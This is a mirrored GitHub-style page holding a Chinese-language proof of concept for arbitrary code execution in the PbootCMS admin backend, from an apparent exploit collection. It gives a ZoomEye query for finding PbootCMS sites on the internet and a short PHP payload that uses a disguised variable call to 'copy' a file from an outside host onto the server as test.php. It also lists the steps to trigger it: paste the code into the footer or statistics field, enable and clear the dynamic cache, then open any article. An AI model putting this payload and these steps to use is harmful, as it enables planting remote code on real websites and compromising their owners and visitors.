admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-13 03:16:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/PbootCMS/PbootCMS全版本后台通杀任意代码执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

33 lines
816 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## PbootCMS全版本后台通杀任意代码执行漏洞
## ZoomEye
```
app:"PbootCMS"
```
## poc
```
<?php
$test="copy";
$test("http://IP:8080/1.txt","test.php");
?>
```
在尾部信息和统计代码中其他位置可能效果一样插入php代码
![image](https://github.com/wy876/POC/assets/139549762/59c806d4-0ad6-41fd-b63e-8fed7966261f)
然后来到全局配置-配置参数
打开动态缓存(如果本就打开 那则不需要打开) 点击右上角的清除缓存
![image](https://github.com/wy876/POC/assets/139549762/4e5aeaab-c7c8-4fd2-af08-c16f922eb3ec)
![image](https://github.com/wy876/POC/assets/139549762/e96a68d8-205e-4aee-8fd3-e9177a868f40)
然后随便点击任意文章,触发漏洞
![image](https://github.com/wy876/POC/assets/139549762/0e4b0c28-99b4-405c-9e37-be7d1d55bcc9)
Reference in New Issue View Git Blame Copy Permalink